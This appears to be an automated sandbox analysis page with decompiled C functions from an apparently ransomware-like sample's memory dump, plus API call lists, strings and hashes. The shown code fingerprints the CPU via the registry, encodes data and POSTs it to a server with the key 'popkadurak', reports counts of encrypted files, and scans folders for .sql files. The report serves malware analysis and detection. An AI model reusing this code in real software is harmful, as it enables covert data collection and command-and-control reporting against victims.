Function 0F587410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F587410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f587426
0x0f587430
0x0f587484
0x0f587432
0x0f587435
0x0f587447
0x0f58744f
0x0f587466
0x0f58746f
0x0f58747b
0x0f587451
0x0f587454
0x0f587457
0x0f587463
0x0f587463
0x0f58744f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587447
RegCloseKey.KERNEL32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587457
GetLastError.KERNEL32(?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587466
RegCloseKey.ADVAPI32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F58746F

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
Instruction ID: 5f62967033a2f304c42e657828e8f883623c85e2f16a5d1cc562925364204c76
Opcode Fuzzy Hash: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
Instruction Fuzzy Hash: FB01213260011DFBDB109F94ED05DDA7F68EB08362B104162FE05E6221D7329A35BBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0F586550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F586550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F5863E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f586553
0x0f586554
0x0f586565
0x0f58656e
0x0f58657f
0x0f586588
0x0f58658d
0x0f586597
0x0f5865b5
0x0f5865b9
0x0f5865c3
0x0f5865c8
0x0f5865c8
0x0f5865d2
0x0f5865df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F584B9E), ref: 0F586565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F584B9E), ref: 0F58657F

Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
Part of subcall function 0F5863E0: GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
Instruction ID: 3fa041b42630bf18f33f63427462cb35c558df6ff126a82b1f3e654db32ba0ff
Opcode Fuzzy Hash: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
Instruction Fuzzy Hash: 0E11F774A41208EBD704DF94CA95F99BBF5EB88705F208188E904AB381D7B5AF119B50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F5853D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0F5853D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0F585F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0F5833E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0F585350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0F587E40( &_v104);
						_v92 = E0F585220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xf58fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xf58fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xf58fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xf58fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xf58fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xf58fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0F588050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0F5853D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xf592a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xf592a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0f5853d9
0x0f5853db
0x0f5853e5
0x0f5853ed
0x0f5853f0
0x0f5853f0
0x0f5853f6
0x0f5853fc
0x0f585401
0x0f58540c
0x0f58540c
0x0f585408
0x0f585408
0x0f585408
0x0f58540e
0x0f58541b
0x0f585421
0x0f585423
0x0f5854dc
0x00000000
0x0f585429
0x0f585429
0x0f58542e
0x0f585433
0x0f585436
0x0f58543a
0x0f58543f
0x0f585447
0x0f5854e4
0x0f5854e9
0x0f5854ea
0x0f5854eb
0x0f5854ec
0x0f5854ed
0x0f5854ee
0x0f5854ef
0x0f5854f6
0x0f5854f7
0x0f5854f8
0x0f5854fa
0x0f5854fd
0x0f585501
0x0f585504
0x0f58550f
0x0f585525
0x0f58552c
0x0f585542
0x0f585546
0x0f585549
0x0f58554b
0x0f585558
0x0f585558
0x0f585558
0x0f58554d
0x0f58554d
0x0f585550
0x0f585552
0x00000000
0x0f585554
0x0f585554
0x0f585554
0x0f585552
0x0f58555e
0x0f585564
0x0f58556d
0x0f585572
0x0f58557a
0x0f58557f
0x0f585587
0x0f58558c
0x0f585594
0x0f585599
0x0f5855a1
0x0f5855a6
0x0f5855ae
0x0f5855b3
0x0f5855bc
0x0f5855c5
0x0f5855c9
0x0f5855ca
0x0f5855d2
0x0f5855d7
0x0f5855e1
0x0f5855e2
0x0f5855e3
0x0f5855e9
0x0f5855ee
0x0f5855ef
0x0f5855f4
0x0f5855f6
0x0f5855f8
0x0f5855fc
0x0f585601
0x0f585609
0x0f585610
0x0f585615
0x0f585617
0x0f585627
0x0f585627
0x0f585619
0x0f585619
0x0f58561c
0x0f58561e
0x0f585623
0x0f585623
0x0f58561e
0x0f585617
0x0f585601
0x0f585637
0x0f585643
0x0f58564d
0x0f58564f
0x0f585652
0x0f585654
0x0f585657
0x0f585657
0x0f585665
0x0f58544d
0x0f58544d
0x0f585452
0x0f585459
0x0f58545c
0x0f58545f
0x0f585466
0x0f58546d
0x0f585481
0x0f58548a
0x0f58548e
0x0f585492
0x0f585492
0x0f58548e
0x0f58549e
0x0f5854a5
0x0f5854ad
0x0f5854af
0x0f5854af
0x0f5854b6
0x0f5854be
0x0f5854be
0x0f5854c0
0x0f5854c3
0x0f5854cd
0x0f5854db
0x0f5854db
0x0f585447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F58541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585492
HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854AD
HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854CD
GetLastError.KERNEL32(?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854DC
lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
lstrlenA.KERNEL32(00000000), ref: 0F5855B3
lstrlenW.KERNEL32(?), ref: 0F5855BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
InternetCloseHandle.WININET(0F58581B), ref: 0F585657

Strings

POST, xrefs: 0F5855CA
popkadurak, xrefs: 0F5855E9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
Instruction ID: 07cc2bf360f6f6a29bb15e7d02c1104266da83b48d801c3e1682e08f9cf90ea1
Opcode Fuzzy Hash: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
Instruction Fuzzy Hash: 7371B371E00309BBDB10ABA5DD45FAEBF78FF88722F144125EA04B7241EB789546CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F585670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F585670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0F583BC0( &_v164);
				E0F587490( &_v164, _t82);
				E0F5872A0( &_v164);
				E0F5870A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xf592a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xf592a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0F585F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0F5854F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F587D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0f585670
0x0f585670
0x0f585690
0x0f585693
0x0f585696
0x0f585698
0x0f58569d
0x0f5856a9
0x0f5856ab
0x0f58569f
0x0f58569f
0x0f58569f
0x0f5856a5
0x0f5856a5
0x0f5856ad
0x0f5856bf
0x0f5856c8
0x0f5856ca
0x0f5856cb
0x0f5856d0
0x0f5856d2
0x0f5856d3
0x0f5856d5
0x0f5856d6
0x0f5856d8
0x0f5856d9
0x0f5856db
0x0f5856dc
0x0f5856de
0x0f5856e1
0x0f5856e3
0x0f5856e4
0x0f5856ec
0x0f5856f7
0x0f585702
0x0f585718
0x0f58571e
0x0f585724
0x0f58572a
0x0f58572f
0x0f585739
0x0f585739
0x0f585757
0x0f585759
0x0f585760
0x0f58576d
0x0f585773
0x0f585773
0x0f58577b
0x0f585780
0x0f58578f
0x0f5857a6
0x0f5857a8
0x0f5857a8
0x0f5857be
0x0f5857be
0x0f5857cb
0x0f5857ce
0x0f5857d0
0x0f5857d3
0x0f5857d8
0x0f5857e1
0x0f5857e1
0x0f5857da
0x0f5857da
0x0f5857df
0x00000000
0x00000000
0x0f5857df
0x0f5857e9
0x0f5857ef
0x0f5857f1
0x0f5857f4
0x0f5857f4
0x0f5857f9
0x0f5857ff
0x0f585801
0x0f585801
0x0f585803
0x0f58580a
0x0f5857f4
0x0f585816
0x0f585830
0x0f58583d
0x0f585845
0x0f585854
0x0f585858
0x0f58585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F585696
wsprintfW.USER32 ref: 0F5856BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F585708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F58571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F58574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F585757
wsprintfA.USER32 ref: 0F58576D
CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F58579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F5857A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F5857C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F585804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F58583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585854

Strings

popkadurak, xrefs: 0F585746, 0F585762
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F5856B9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
Instruction ID: 248f84567f179666a6ba6c55420372e62117f4a21e51764751ad9fcf69e89744
Opcode Fuzzy Hash: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
Instruction Fuzzy Hash: 5A51D770B00305FFEB24AB64DD86F9E7B78FB44711F540065F601B6282EBB8AA16DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F586BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F586BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F588260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F586B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0f586bab
0x0f586baf
0x0f586bbe
0x0f586bc1
0x0f586bc4
0x0f586bde
0x0f586be3
0x0f586be6
0x0f586bf0
0x0f586c00
0x00000000
0x0f586c1c
0x0f586c24
0x0f586c2b
0x0f586c31
0x0f586c34
0x0f586c39
0x0f586d08
0x0f586d08
0x00000000
0x0f586c40
0x0f586c40
0x0f586c46
0x0f586c49
0x0f586c4a
0x00000000
0x00000000
0x00000000
0x0f586c4a
0x0f586c4e
0x00000000
0x0f586c54
0x0f586c5a
0x0f586c5e
0x00000000
0x0f586c64
0x0f586c77
0x0f586c82
0x0f586c86
0x0f586c8f
0x0f586ca0
0x0f586ca4
0x0f586cb7
0x0f586cce
0x0f586cd4
0x0f586cde
0x0f586cde
0x0f586ce9
0x0f586ce9
0x0f586cef
0x0f586cef
0x0f586cf3
0x0f586cf9
0x0f586cfe
0x0f586d0a
0x0f586d0f
0x00000000
0x0f586d0f
0x0f586cfe
0x0f586c5e
0x0f586c4e
0x0f586c39
0x00000000
0x0f586d12
0x0f586d22
0x0f586d2d
0x0f586d3b

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
lstrcatW.KERNEL32 ref: 0F586BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
lstrcatW.KERNEL32 ref: 0F586C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0F586CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0F586CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F586D1C
FindClose.KERNEL32(?,?,?), ref: 0F586D2D

Strings

.sql, xrefs: 0F586C54
*******************, xrefs: 0F586CB9, 0F586CC9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
